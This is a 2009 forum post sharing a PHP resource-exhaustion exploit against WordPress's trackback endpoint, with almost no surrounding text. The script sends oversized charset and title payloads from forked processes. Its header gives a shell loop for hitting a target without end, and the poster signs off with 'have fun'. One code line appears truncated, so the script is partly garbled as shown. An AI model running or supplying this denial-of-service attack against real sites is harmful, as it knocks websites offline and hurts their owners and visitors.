adi003 Posted October 19, 2009 Report Posted October 19, 2009 <?php/* * wordpress Resource exhaustion Exploit * http://rooibo.wordpress.com/ * security@wordpress.org contacted and get a response, * but no solution available. * * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org <panic@zerial.org> * * exploiting: * you must install php-cli (command line interface) * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done * */if(count($argv) < 2) die("You need to specify a url to attack\n");$url = $argv[1];$data = parse_url($url);if(count($data) < 2) die("The url should have http:// in front of it, and should be complete.\n");$path = (count($data)==2)?"":$data['path'];$path = trim($path,'/').'/wp-trackback.php';if($path{0} != '/') $path = '/'.$path;$b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($;$charset = "";$charset = str_pad($charset,140000,"UTF-8,");$str = 'charset='.urlencode($charset);$str .= '&url=www.example.com';$str .= '&title='.$b;$str .= '&blog_name=lol';$str .= '&excerpt=lol';for($n = 0; $n <= 5; $n++){ $fp = @fsockopen($data['host'],80); if(!$fp) die("unable to connect to: ".$data['host']."\n"); $pid[$n] = pcntl_fork(); if(!$pid[$n]){ fputs($fp, "POST $path HTTP/1.1\r\n"); fputs($fp, "Host: ".$data['host']."\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: ".strlen($str)."\r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $str."\r\n\r\n"); echo "hit!\n"; }}?>have fun. autorul e mentionat in script Quote
